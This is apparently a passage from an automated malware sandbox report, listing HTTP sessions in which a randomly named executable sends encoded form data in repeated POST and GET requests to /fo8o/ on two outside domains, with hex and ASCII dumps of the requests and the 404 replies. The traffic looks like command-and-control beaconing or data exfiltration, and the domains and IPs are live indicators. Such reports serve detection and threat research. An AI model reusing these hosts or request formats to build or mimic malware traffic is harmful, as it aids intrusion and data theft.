6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	61289	116.50.37.244	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:42:05.365175962 CET	813	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 218 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4e 57 2b 6c 36 56 44 69 55 6a 66 53 54 6e 4d 45 48 39 5a 54 68 7a 67 4d 46 49 64 59 4a 36 43 4f 55 34 77 31 69 59 36 39 45 41 43 78 71 63 36 6e 51 3d 3d Data Ascii: tjVTF=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfONW+l6VDiUjfSTnMEH9ZThzgMFIdYJ6COU4w1iY69EACxqc6nQ==
Jan 9, 2025 09:42:06.250606060 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Thu, 09 Jan 2025 08:42:05 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	61290	116.50.37.244	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:42:07.904731035 CET	833	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 238 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 4c 62 49 48 73 72 50 76 6e 33 4d 56 38 6f 34 41 73 62 69 7a 6c 6f 38 34 39 2b 78 73 46 6b 6f 44 62 72 67 5a 65 67 46 4e 68 45 66 53 37 4c 79 4f 63 3d Data Ascii: tjVTF=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwLbIHsrPvn3MV8o4Asbizlo849+xsFkoDbrgZegFNhEfS7LyOc=
Jan 9, 2025 09:42:08.803138971 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Thu, 09 Jan 2025 08:42:08 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	61291	116.50.37.244	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:42:10.435543060 CET	1846	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1250 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 57 68 6e 6e 4d 6d 38 7a 49 2f 76 74 57 32 35 53 38 33 55 42 75 7a 46 41 38 70 49 79 36 62 70 35 32 51 37 47 6e 34 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 53 49 78 6b 52 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a [TRUNCATED] Data Ascii: tjVTF=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZWhnnMm8zI/vtW25S83UBuzFA8pIy6bp52Q7Gn4SYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZSIxkRfgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB1wpNShMPckys2DneIINpTzAmuPaAzpQX1rpe4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7rPVUgpLUAY6ZLP8nEfomTXdULQucQIpCpTC0WvC7SSq/oVM1fhXkv52DijvfxSgCZ1pVQZit/ZjUZItB6AdVDtnWpE1AbNfINURZBS40B4oeBAMaRlNg7bJPtvdduHNwDQKC1kB0AP1fQ4Kok94p8fk4usG2txjuvY7FsNioUx+I6414ihiPVy/GHwMqAMhRSMFLsXJAdK1PBR9P1j/pPg+3YHCaYoZcs34vBXQups+ZYtHdLtuzknQrahXZpjVHFwxGG1PCOBOyIxU72X7Rqxf04UDhsstqvKvtIC54GJLFIKSMDiOOIw1kdQlmsZEtpMkWERAqfIJ+gHgdyqwCH6iL+RB8UPCRBDXPc/CgGFc/5hxCZsRB8ThoQh6BDFYgZGAb5PkvgD+JXGl1CaNQMmvi6AIpMIChwYGzlxkVKCqvpdNy+Ct6Ycto2bEu8p/xOcsUsIK3YP/cQJ2L30ElRRqrK9WxrOip+p+u+9HNxlkcFUxthIQcASTK4dPhoG5Q04R/sBTORYyU7xMj [TRUNCATED]
Jan 9, 2025 09:42:11.317135096 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Thu, 09 Jan 2025 08:42:10 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	61292	116.50.37.244	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:42:12.966685057 CET	536	OUT	GET /fo8o/?tjVTF=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxnciuyQt15M5Zq/CPuMEXgodEuvjC2Tprvq68sXKyaNl/eQdY42yXteh&2na=ihrTFVnP9VKx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 9, 2025 09:42:13.832950115 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Thu, 09 Jan 2025 08:42:13 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	61293	85.159.66.93	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:42:27.161689043 CET	792	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 218 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 30 6d 33 64 62 4e 68 44 68 71 70 56 78 73 47 51 38 63 69 77 6f 62 4d 66 47 44 45 54 54 58 74 30 46 77 50 70 7a 73 54 7a 43 62 78 76 45 65 4b 35 51 3d 3d Data Ascii: tjVTF=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R00m3dbNhDhqpVxsGQ8ciwobMfGDETTXt0FwPpzsTzCbxvEeK5Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	61294	85.159.66.93	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:42:29.731842041 CET	812	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 238 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6a 33 62 45 6e 79 45 31 4b 59 32 45 30 58 6b 52 59 79 73 31 2b 62 69 57 2f 4f 76 74 67 45 50 65 44 52 55 6b 38 34 47 57 58 39 73 73 52 56 39 42 38 3d Data Ascii: tjVTF=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5j3bEnyE1KY2E0XkRYys1+biW/OvtgEPeDRUk84GWX9ssRV9B8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	61295	85.159.66.93	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:42:32.267832994 CET	1825	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1250 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 37 43 70 66 30 37 2b 4f 47 4b 4c 33 48 63 79 76 79 77 6c 69 48 2b 48 36 46 44 46 69 49 4a 63 5a 63 72 2b 62 55 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 50 4f 73 38 46 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 [TRUNCATED] Data Ascii: tjVTF=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/7Cpf07+OGKL3HcyvywliH+H6FDFiIJcZcr+bUYwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JPOs8FQIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBuORqZvOIduHT5ua2VunEsxTtqW9Hzv4C73V5BciD6jh4S6IfuEsb550muWnceqjpZzyLMUiRSsgOqUShzbiCgh40GXUleyGCM3NgW+tQURwV1dO24G4rea3U6Ffj25A4NzEagsprA5VScT8CV3E+ajBmMKNn80Ie03krdGC1X/nBbKUHKYr+KAnfyh+CR9Q3yAplJju8TYG78Dk1c16QLYhPsb/FU2St/h9fxfU8wPbOa2Wd/4tUJQsmHjWF/9/SbVETy20vWWjGfqfJG4J2c5jncKPudkZqcEALwkcJ/x0iC5BdIIu85fmIv/alIXtEAG0EQDOuoF+Cr9rbjdU6mR+ov8VmxL82qZwn62SRcE/hIpvwX7ImpP/fDcuyEcxrL1Iw1rcb43EmeSsYFqKORO/2kjbpZkKEBckzZwe8IbxlpA2BxBY4pu/GROUuK/s8oRkATNcpWS2qbXcUJWZTJ/CsXoeST6yjX6JW050d05PCbfjUr7GDbP4uG6mYj1EzuB+ZGz7hDE/k7CxulLC5mh3GhuhCO6HEkghkU+d5adZ3cHDEgLBZMrF+XJSnYgN6sWtoWVvvWO53alS/2hE8FQ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	61296	85.159.66.93	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
